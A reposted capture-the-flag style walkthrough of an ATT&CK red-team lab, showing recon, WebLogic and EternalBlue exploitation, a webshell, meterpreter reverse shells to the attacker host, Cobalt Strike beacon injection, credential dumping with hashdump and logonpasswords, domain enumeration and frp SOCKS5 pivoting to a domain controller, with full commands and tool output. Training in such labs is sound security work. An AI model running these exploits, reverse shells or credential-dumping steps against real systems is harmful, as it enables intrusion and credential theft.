ATT&CK Red Team Evaluation Practice Lab 2

admin, 2024-12-06 15:43:59

Topology diagram

[image-20241205130334986]

Environment setup

WEB (WEB.de1ay.com)

The de1ay account cannot log in with the default password. Log in locally as web\administrator (blank password) and reset the de1ay account's password to the default (1qaz@WSX).

Activate Windows with HEU_KMS (choose the "reset Windows" option).

netsh advfirewall show currentprofile   # check firewall status -> enabled

Start WebLogic (default port 7001): C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic

netstat -an | findstr 7001   # confirm it is listening

DC

Default password (1qaz@WSX)

netsh advfirewall show currentprofile   # check firewall status -> enabled

Serves as both the domain controller and the DNS server.

PC

Default password (1qaz@WSX)

netsh advfirewall show currentprofile   # check firewall status -> enabled

External reconnaissance

nmap -v -T4 -p- -A -oN ATT_02.log 192.168.30.131
#-v: verbose output
#-A: aggressive scan (OS detection, version detection, default scripts, traceroute)
#-p-: all 65535 ports
#-T4: timing template (relatively fast)
#-oN ATT_02.log: save the results in normal format
[image-20241205131758931]

Scan results

3389 - Remote Desktop (RDP)

445 - file sharing (SMB)

1433 - Microsoft SQL Server 2008 R2 10.50.4000.00; SP2

7001 - WebLogic

OS: Windows Server 2008 R2 Standard

Attack approach

3389: brute force, RDP vulnerability exploitation

445: EternalBlue (MS17-010)

7001: Java framework vulnerabilities (WebLogic)

1433: searchsploit

searchsploit

-t   search exploit titles only

-m   mirror (copy) an exploit into the current directory

-w   show the exploit-db.com URL instead of the local path

Mirror the script locally:
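Added example (not code from the original article): a small Python parser for the nmap -oN normal output above that turns the port table into structured records and maps each open port to the follow-up checks listed under the attack approach. SAMPLE_OUTPUT is constructed; only the port set, the MSSQL banner and the OS line are taken from the article's scan result, and the PLAYBOOK entries are the article's own attack ideas. Point parse_nmap_normal at the real ATT_02.log to use it on a live scan.

```python
"""Parse nmap normal (-oN) output and map open ports to follow-up checks.
Added example; not code from the original article."""
import re
from typing import Dict, List, NamedTuple


class Port(NamedTuple):
    number: int
    proto: str
    state: str
    service: str
    version: str


class Scan(NamedTuple):
    host: str
    os: str
    ports: List[Port]


# Constructed sample of -oN output for the WEB host. The port set, the MSSQL banner and
# the OS line follow the article's scan result; the other VERSION strings are illustrative.
SAMPLE_OUTPUT = """\
# Nmap 7.94 scan initiated as: nmap -v -T4 -p- -A -oN ATT_02.log 192.168.30.131
Nmap scan report for 192.168.30.131
Host is up (0.00041s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds  Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
3389/tcp open  ms-wbt-server Microsoft Terminal Service
7001/tcp open  http          Oracle WebLogic Server (Servlet 2.5; JSP 2.1; T3 enabled)
OS details: Microsoft Windows Server 2008 R2 Standard
# Nmap done -- 1 IP address (1 host up) scanned
"""

# Port table rows look like "<port>/<proto>  <state>  <service>  [<version ...>]".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Follow-up checks per port, taken from the attack approach above. Keyed on the port
# number because nmap labels a port like 7001 only as generic "http".
PLAYBOOK: Dict[int, List[str]] = {
    3389: ["msf auxiliary/scanner/rdp/ms12_020_check (check only; the DoS module just blue-screens)",
           "RDP credential brute force"],
    445: ["msf auxiliary/scanner/smb/smb_ms17_010, then exploit/windows/smb/ms17_010_eternalblue"],
    7001: ["WebLogic scanner (console exposure, T3/XMLDecoder deserialization)",
           "searchsploit -w weblogic <version>"],
    1433: ["searchsploit -t 'Microsoft SQL Server'"],
}


def parse_nmap_normal(text: str) -> Scan:
    """Extract host, OS details and the port table from -oN text."""
    host, os_details, ports = "", "", []
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line[len("Nmap scan report for "):].strip()
        elif line.startswith("OS details:"):
            os_details = line.split(":", 1)[1].strip()
        else:
            m = PORT_RE.match(line)
            if m:
                ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                                  m.group(4), (m.group(5) or "").strip()))
    return Scan(host, os_details, ports)


def triage(scan: Scan) -> Dict[int, List[str]]:
    """Return {port: [checks]} for every open port that has a playbook entry."""
    plan: Dict[int, List[str]] = {}
    for p in scan.ports:
        if p.state == "open" and p.number in PLAYBOOK:
            plan[p.number] = list(PLAYBOOK[p.number])
    # 2008 R2 is on ms17_010_eternalblue's target list, so flag it before running the check.
    if "2008 R2" in scan.os and 445 in plan:
        plan[445].append("OS fingerprint matches the ms17_010_eternalblue 'Windows Server 2008 R2' target")
    return plan


if __name__ == "__main__":
    scan = parse_nmap_normal(SAMPLE_OUTPUT)  # or open("ATT_02.log").read()
    print(f"{scan.host}  OS: {scan.os}")
    for port, checks in sorted(triage(scan).items()):
        print(f"  {port}: " + " | ".join(checks))
```

The parser keys on the port number rather than the service name on purpose: nmap reports 7001 as plain "http", so a service-name lookup would miss the WebLogic checks that matter most on this host.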

[image-20241205134315639]

3389

Only a check module is available for MS12-020; the other module is a DoS that blue-screens the host and yields no shell, so it is not used for the attack.

msf6 > search ms12-020

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check              .                normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf6 > use 0
msf6 auxiliary(scanner/rdp/ms12_020_check) > options

Module options (auxiliary/scanner/rdp/ms12_020_check):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    3389             yes       Remote port running RDP (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.30.131
rhosts => 192.168.30.131
msf6 auxiliary(scanner/rdp/ms12_020_check) > run

[+] 192.168.30.131:3389   - 192.168.30.131:3389 - The target is vulnerable.
[*] 192.168.30.131:3389   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rdp/ms12_020_check) >

445

msf6 > search ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .

Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.30.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tc
[-] The value specified for payload is not valid.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.30.131
rhosts => 192.168.30.131
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.30.128:4444
[*] 192.168.30.131:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.30.131:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.30.131:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.30.131:445 - The target is vulnerable.
[*] 192.168.30.131:445 - Connecting to target for exploitation.
[+] 192.168.30.131:445 - Connection established for exploitation.
[+] 192.168.30.131:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.30.131:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.30.131:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.30.131:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.30.131:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.30.131:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.30.131:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.30.131:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.30.131:445 - Sending all but last fragment of exploit packet
[-] 192.168.30.131:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.

Blocked by 360

[image-20241205141250151]

The connection reset above is 360 (the antivirus on WEB) blocking the exploit; you can turn 360 off and run again.

chcp 65001            # switch the shell's code page to UTF-8 to fix garbled output

exit                  # leave the shell and return to meterpreter

background            # put the session in the background

sessions              # list sessions with their IDs

sessions -i <id>      # interact with a session

sessions -k <id>      # kill a session

Exploitation

7001

Automated tools

[image-20241205143101803]

Connect with the Godzilla (哥斯拉) webshell client, get a shell and gather information; the privileges are fairly low.

[image-20241205201001495]

WebLogic vulnerability scanner script

[*] =========Task Start=========
[+] [192.168.30.131:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.30.131:7001] Weblogic console address is exposed! The path is: http://192.168.30.131:7001/console/login/LoginForm.jsp
[+] [192.168.30.131:7001] Weblogic UDDI module is exposed! The path is: http://192.168.30.131:7001/uddiexplorer/
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[image-20241205201040493]

CVE-2019-2725

Unsuccessful.

[image-20241205201531489]

The WebLogic version is 10.3.6.0.

[image-20241205202525604]

Try the Kali tools one by one.

[image-20241205202609204]

Hardly any of them succeed. searchsploit -w weblogic 10.3.6.0 gives the exploit-db URLs; filtering for the ones that actually apply leaves only 44553. That exploit was already covered in another article and is not reproduced here.

[image-20241205205518854]

Getting an MSF session

Back in the Godzilla connection, fill in the fields as Godzilla prompts, click Go, and the MSF session comes in.

[image-20241205210653395]

Privilege escalation

[image-20241205222020962]

migrate 492   # migrate into a process running as SYSTEM (492 is the PID of a SYSTEM process seen in ps during this run)

[image-20241205222202859]

Getting a CS (Cobalt Strike) beacon

[image-20241205180354751]
[image-20241205180419710]

Create a new listener (it has to be a Foreign HTTP listener for a Metasploit windows/meterpreter/reverse_http payload to stage from it).

[image-20241205211649279]

The team server (the attacker box, your Kali) then listens on port 8088.

Passing the MSF session to CS

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

 Id  Name  Type                     Information      Connection
 --  ----  ----                     -----------      ----------
  1         meterpreter x86/windows  WEB\de1ay @ WEB  192.168.30.128:9999 -> 192.168.30.131:63910 (192.168.30.131)

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.30.128
lhost => 192.168.30.128
msf6 exploit(windows/local/payload_inject) > set lport 8088
lport => 8088
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PrependMigrate true
PrependMigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run

[*] Running module against WEB
[*] Spawned Notepad process 5080
[*] Injecting payload into 5080
[*] Preparing 'windows/meterpreter/reverse_http' for PID 5080
msf6 exploit(windows/local/payload_inject) >

The beacon checks in successfully.

[image-20241205222423499]

Adjust the sleep time.

[image-20241205222442659]

Internal network information gathering

To run system commands from the beacon, prefix them with shell.

[image-20241205220634534]

Dump password hashes: hashdump

[image-20241205220755655]

Grab plaintext passwords: logonpasswords

[image-20241205221029993]

List other domain users: shell net user /domain

[image-20241205221557534]

List domain admins: shell net group "domain admins" /domain

[image-20241205221659764]

List domain computers: shell net group "domain computers" /domain

[image-20241205221731351]

List domain controllers: shell net group "domain controllers" /domain

[image-20241205222550118]

Locate the DC: shell ping DC

[image-20241205222654064]

Internal scan: portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024

[image-20241205224900541]

Domain controller:

DC   10.10.10.10

Two hosts:

PC   10.10.10.201

WEB  10.10.10.128

Domain admin: Administrator

Other users: de1ay, Guest, krbtgt, mssql

frp deployment

frpc goes on the machine inside the internal network (WEB).

frps goes on the machine with the public-facing IP (the attacker box, Kali).

frps.ini (frps only reads the [common] section; the proxy definition lives on the client side, so the [socks5] block does not belong here):

[common]
bind_addr = 0.0.0.0   # address frps listens on
bind_port = 7000      # port frps listens on

[image-20241205233749728]

frpc.ini:

[common]
server_addr = 192.168.30.128   # attacker (frps) IP
server_port = 7000             # frps listening port

[socks5]
type = tcp
remote_port = 1080   # port frps opens for the socks5 proxy
plugin = socks5      # run frp's built-in socks5 plugin on the client

Neither side sets a token, so anything that can reach port 7000 can register proxies against this frps, and the SOCKS port on 1080 is unauthenticated; that is acceptable in a closed lab and nowhere else.

Upload the two files frpc.ini and frpc.exe to WEB through the CS file upload.

Start frpc from an RDP session opened from Kali.

[image-20241205234825310]
[image-20241205235009072]

Kali now also has port 1080 listening (opened by frps).

[image-20241205235055234]

Kali has no interface on the 10.x network, yet pinging the DC at 10.10.10.10 now reaches it. (The SOCKS5 tunnel only carries TCP, so ICMP does not travel through frp; the ping is not evidence that the tunnel works. Verify it with a TCP connection through 127.0.0.1:1080 instead.)

[image-20241205235324696]

proxychains deployment

vim /etc/proxychains4.conf

At the end of the file, comment out the socks4 line and add: socks5 127.0.0.1 1080

[image-20241205235656478]
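Added example, serving both the frp tunnel above and the proxychains step: a minimal SOCKS5 CONNECT client in Python (RFC 1928, no authentication, which is what frp's socks5 plugin offers with the configuration above) that does by hand what proxychains does for every TCP connection, and therefore also shows why ping never goes through the tunnel. It ships with an in-process fake SOCKS5 server so it runs offline; against the real tunnel call socks5_connect(("127.0.0.1", 1080), "10.10.10.10", 3389). The fake server, the probe helper and the hostnames are constructed for this example and are not part of frp, proxychains or the original article.

```python
"""Hand-rolled SOCKS5 CONNECT (RFC 1928) to check a socks5 tunnel end to end.
Added example; not part of the original article, frp or proxychains."""
import socket
import struct
import threading
from typing import List, Tuple

SOCKS_VER = 5
CMD_CONNECT = 1
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 1, 3, 4
REPLY_TEXT = {
    0: "succeeded", 1: "general SOCKS server failure", 2: "connection not allowed by ruleset",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def socks5_connect(proxy: Tuple[str, int], dst_host: str, dst_port: int,
                   timeout: float = 5.0) -> socket.socket:
    """Return a TCP socket to dst_host:dst_port tunnelled through a no-auth SOCKS5 proxy.
    Raises ConnectionError with the server's reply text if the proxy refuses."""
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        # Greeting: VER=5, NMETHODS=1, METHODS=[0x00 = no authentication].
        s.sendall(bytes([SOCKS_VER, 1, 0x00]))
        ver, method = _recv_exact(s, 2)
        if ver != SOCKS_VER or method != 0x00:
            raise ConnectionError(f"proxy rejected no-auth (ver={ver}, method={method:#x})")
        # Request: VER CMD RSV ATYP DST.ADDR DST.PORT. IPv4 literals go as ATYP=1; anything
        # else is sent as a domain name (ATYP=3) so the proxy resolves it, like proxy_dns.
        try:
            addr = bytes([ATYP_IPV4]) + socket.inet_aton(dst_host)
        except OSError:
            name = dst_host.encode("idna")
            addr = bytes([ATYP_DOMAIN, len(name)]) + name
        s.sendall(bytes([SOCKS_VER, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", dst_port))
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        # Consume BND.ADDR/BND.PORT so the caller starts with a clean stream.
        if atyp == ATYP_IPV4:
            _recv_exact(s, 4 + 2)
        elif atyp == ATYP_DOMAIN:
            _recv_exact(s, _recv_exact(s, 1)[0] + 2)
        elif atyp == ATYP_IPV6:
            _recv_exact(s, 16 + 2)
        if ver != SOCKS_VER or rep != 0:
            raise ConnectionError(f"CONNECT {dst_host}:{dst_port} failed: "
                                  f"{REPLY_TEXT.get(rep, f'reply {rep}')}")
        return s
    except Exception:
        s.close()
        raise


def _fake_socks5_server(listener: socket.socket, seen: List[Tuple[int, str, int]], rep: int) -> None:
    """Stand-in for the socks5 plugin, constructed for the self-test: records the CONNECT
    target, answers with reply code `rep`, then echoes one message back."""
    conn, _ = listener.accept()
    with conn:
        _recv_exact(conn, 3)                      # greeting
        conn.sendall(bytes([SOCKS_VER, 0x00]))    # select no-auth
        _ver, cmd, _rsv, atyp = _recv_exact(conn, 4)
        if atyp == ATYP_IPV4:
            dst = socket.inet_ntoa(_recv_exact(conn, 4))
        else:
            dst = _recv_exact(conn, _recv_exact(conn, 1)[0]).decode()
        port = struct.unpack("!H", _recv_exact(conn, 2))[0]
        seen.append((cmd, dst, port))
        conn.sendall(bytes([SOCKS_VER, rep, 0x00, ATYP_IPV4]) + socket.inet_aton("0.0.0.0") + b"\x00\x00")
        if rep == 0:
            conn.sendall(conn.recv(64))           # echo whatever the client sends


def probe_through_proxy(dst_host: str, dst_port: int, rep: int = 0) -> Tuple[Tuple[int, str, int], bytes]:
    """Run socks5_connect against the in-process fake proxy; return what the proxy saw
    and the echoed payload. With rep != 0 the client raises ConnectionError."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    seen: List[Tuple[int, str, int]] = []
    t = threading.Thread(target=_fake_socks5_server, args=(listener, seen, rep), daemon=True)
    t.start()
    try:
        with socks5_connect(listener.getsockname(), dst_host, dst_port) as s:
            s.sendall(b"hello DC")
            echoed = _recv_exact(s, len(b"hello DC"))
    finally:
        t.join(2.0)
        listener.close()
    return seen[0], echoed


if __name__ == "__main__":
    # Real tunnel: socks5_connect(("127.0.0.1", 1080), "10.10.10.10", 3389)
    print(probe_through_proxy("10.10.10.10", 3389))
```

The only command the client ever sends is CONNECT, a TCP stream request; there is no SOCKS5 command for ICMP, which is why a ping from Kali says nothing about the tunnel while a successful CONNECT to 10.10.10.10:3389 does. The reply code mapping is also the quickest way to tell a broken frpc (connection closed during the handshake) from a firewall on the target (reply 5, connection refused, or 4, host unreachable).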

Without the proxy we cannot reach the DC:

[image-20241206000002242]

Through proxychains4 the connection goes through, but no login screen appears:

[image-20241206000140128]

Looking this up afterwards: rdesktop has no Network Level Authentication support.

[image-20241206000635556]

So connect with xfreerdp instead; this works normally:

proxychains4 xfreerdp /u:administrator /d:de1ay /p:1qaz@WSX /sec:rdp /v:10.10.10.10 /cert-ignore
[image-20241206001017421]

For a global proxy, run proxychains4 bash: every command started from that shell is then routed through the SOCKS5 proxy.

End

Originally published on the WeChat public account flowers-boy: ATT&CK Red Team Evaluation Practice Lab 2

Disclaimer: the programs and methods in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact by e-mail (preferably from a corporate or otherwise valid mailbox so the mail is not filtered; contact details are on the home page).

Reposted on CN-SEC (keep this link when reposting): https://cn-sec.com/archives/3473573.html